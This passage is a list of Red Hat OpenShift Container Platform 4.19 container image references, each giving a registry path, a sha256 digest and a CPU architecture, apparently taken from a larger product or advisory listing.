"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
